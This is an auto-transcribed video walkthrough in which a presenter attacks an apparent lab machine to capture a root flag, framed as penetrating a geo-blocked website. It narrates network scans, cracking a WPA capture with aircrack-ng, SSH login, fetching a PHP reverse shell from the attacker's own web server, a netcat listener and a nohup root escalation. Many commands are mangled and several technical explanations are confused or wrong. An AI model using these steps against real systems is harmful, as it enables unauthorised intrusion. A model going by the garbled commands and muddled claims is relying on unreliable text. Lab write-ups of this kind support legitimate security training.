Hello guys, welcome back to a pen testers club. Today we are going to discuss about how to do a penetration testing on blocked website. Like you cannot if you are in staying in one country, so that you cannot able to access that website. Like that precisely used only the inside of that country, only with the targeted of IP address only. So we would like to do a the type of target websites. So we would like to start now. So what is the basic penetration testing methodologies? So the basic penetration testing methodologies is like Reconnaissance, net discovery, Reconnaissance, enumeration, exploitation, and privilege escalations. That's it. So first, basically we would like to do, just open the terminal, just type sudo su, enter the password. You just type net discover minus I each 0. So I already identified here. So this is my targeted system. So I just quit now. You just type nmap minus t4 dot 54. So let's wait for the nmap. So as we always identify the host IP using the net discover command. So we already discovered, and now we continue with the net discover. For the reconnaissance, what are the open ports and breaching points is available. We would like to look. Okay. So here we got it. You can see here 22 is TCP open SSH. So this is for an SSH, and this is an hotkeys for SSH from here to here, hotkeys. And 8 is an open port. So you can see here, if you enter this thing, it will come as an 403 forbidden. Like it uses the Cloudflare IP, so you cannot able to access. And 8080 is a busy box. Okay, and 9000, it's like a PHP client server, so it was hosted in the PHP client server. So once you get the nmap result, you need to analyze and get it everything clear. So now you just come back, open the Firefox. So now just type 192.168.1.54. So now you can see here directly. So I'm using this application through another targeted system. So no configuration file found, no installation code is available for existing. Like only the supported person only can access this one. So I'm not the supported person for this one. So I'm just a penetration tester, but I would like to penetrate this website and get the root flag. So this is our target. So now what we would like to do. So this one is closed. So now we would like to look 80 is closed. 8080 we would like to go and look. 8080 404 file not found. It's okay. Now we would like to look. So I would like to enumerate one more time. So I would like to look one more missing thing is here is I would like to display more ports here. So something is missing here. So that's why. So let's wait for this result. So nmap will take too much time, so let's wait for the right result. But I got only the 4 results, but I would like to get any hidden directories or hidden ports is available here or not. 5 seconds is remaining. Yeah, you can see here in previous I just put here without a port, but it's enumerated only the 4. Now it's enumerated 5. You can see here 5. 22 is SSH, 8 is TCP, 8080 is HTTPX, and 8999 is an open web file system. So we would like to go in this now. So we would like to look 8999. So come back here. You just look 8399. So here we get the file system of the web. So here we got it some files and everything. So we would like to go and get the wpa1.cap. So you just need to download this one. So once downloaded, you just come back. Now go to a directory like cd. We just need to come back here. Oh, so I already downloaded this one. No trash. So you just need to open this one, WPA1 cap. So in the Wireshark, you can open this one. So in the first thing, source, it's like you look D-link. So whatever the targeted person is using the D-link of network, and in the downside, you just look third one, 802.11 wireless management. So you just click on this and you just click on tagged parameters. The tagged parameters, you can look SSID parameter set D-link. So you look here, tag ID, SSID is a D-link. So you got the user ID. So we need to analyze and get it that user ID is an a D-link. So we notice that D-link as shown in the image, and this can be probably used as a password. So this was sniffed by Wireshark and he was used the Wi-Fi. So we would like to crack using the aircrack ng as an password. So I just quit this one, come back, quit this also. Now you just type cd downloads. Now you just type aircrack ng minus w, specify the word list. So you can specify the word list, user share word list, rock.txt, and you just mention WPA 01.cap. So it will crack the password of the unrestricted of the targeted website. So let's wait for this. So when you come here, even it was hosted in the WordPress, because the persons is only mentioned the only a target specific IP address. So we cannot able to log in this one, but we will log in directly to a WordPress now. Okay, so not in the graphical user interface, but in the directly of the system. So now let's see. So he was hosted in the WordPress like a SSH and everything here. So we need to look here. So we can come back here. So he was hosted in the WordPress including the SSH, and he was restricted through the IP address directly. So even you can restrict it with 8080, but we are cracking with 8999 the password of the SSH. Once we get it that SSH, this is the opening port for SSH for PHP client server. So now let's see. Now we got the password. You can see here the username is d-link and his password is password. So I think he was hosted in his Windows Server uh, system. So we would like to get it done now. So you just type sh d-link at the rate 192.168.1.54 and it will give ask a permission. You just type yes and enter the password. So we have successfully cracked the sh and we have login. So now we would like to get the root access flag. So for that, so now let's go for post exploitation and try to escalate a root privilege. So now we would like to look list, no have anything. So list minus selection, no have anything else. So here dev.null. So now we would like to go for post exploitation and try to escalate a root privilege. While doing post enumeration, we found a writable permission assigned on the everything here. So now we would like to look here. So just type find writable, type d2 is greater than. So you just need to mention this one dev null. So it will give some commands here. So let's look. So inside the hidden directory, so we cannot able to access that one. So now we would like to access directly that targeted website in the root flag. Okay, so let's wait for this. So now we would like to look here and some other thing. So let me tell you. So I would like to target only this one where www.world public files. So he was hosted in Windows 2022 as server PC machine. So he was hosted here. So this is his system. So we would like to go further like that. So now we would like to type, copy this one, you just type cd where www.bold public files. So now you just type list minus lha, only have ht.access and index.html. So this is almost all we know. It's a WordPress website. So we would like to go for getting the PHP reverse shell. PHP reverse shell pentest mode. So this is a PHP reverse shell. You just need to copy this one. Once you copied, then you just come back here, quit. So just type file, new tab, you just type list. So here I already have a reverse shell.php. So I just show you how to do mousepad or shell.php. So I already configured here everything. You can see here everything is here. So I just put it here. So I just type ifconfig. So my IP address. So I just make configured everything clear. So you just need to change the IP address, and port is a default. As you wish, you can put it the port. So you just come back here. You just type python 3 -m http.server. So it's running. So now you just need to come back here in the old file. So you just type wcget http 192.168.1.84 8000 r shell.php. So you got it successfully, r shell.php. Now just come back, you just quit this, and now what you would like to do, you just type here netcat minus lvnp 1234, and you just come back here. So once you look everything here clear, so you can't able to execute anything else. So now you would like to go for PHP web server of 9000. So you just come back here, come back here, 9000. So you can see here uncaught accepted exception, bold database drive error. So you cannot able to access this one. So you just need to already access through the SH server. So you just need to type files rshell.php. That's it. Now you just look here, you got it successfully in the root directory. So you just type id, you got it, list, you got it. So you just type cd root, got it. So you just type list, you got it. So you just look here, cat.flag.txt, cat flag.txt. So you have successfully got the privilege escalation of this machine, whatever he hosted and unrestricted of the targeted website. Using Cloudflare, he unrestricted everything. So I would like to look, this is in second way. So this is in one method. So without going to uploading a reverse shell, but we would like to get the access directly. So the same thing we would like to do here. So come back, you just copy this one, same thing, copy, come back, we just type cd, paste it. Now let's look. So something here is was written no hub, but it's not displaying. So you can directly go with no hub. So for that, you just type no hub, no hub, bin sh minus p minus c sh minus p tty tty is greater than dollar tty. So you directly got it the root access. So you just type id, everything you got. Now you just type cd root, type a list. You just type, cd root. Yes, you got the root. So you just type list. You just type cat flag.txt. So you got successfully uh, privilege escalation of this website. You have see here, we got it. Root dance, it's an dog. So now let's look further here. So first, how we would like to get the unrestricted of the targeted website. We get the root privilege access. So first we just first we go with the net discovery. Then we go for nmap. Nmap, once you type, you need to describe sometimes as a port. Once you describe the ports, and hidden ports also will be displayed. Once hidden port is displayed, then we go for download the uh, Wireshark file, and we crack the password through aircrackng. So once we crack the password, then we would like to go with SH. Then we go with the escalations, and we come to a privilege escalations and get the root access. So even if you want to upload the file also, you can upload using the WordPress of that one. So you try it your own guys. Thank you guys for watching. Have a great day.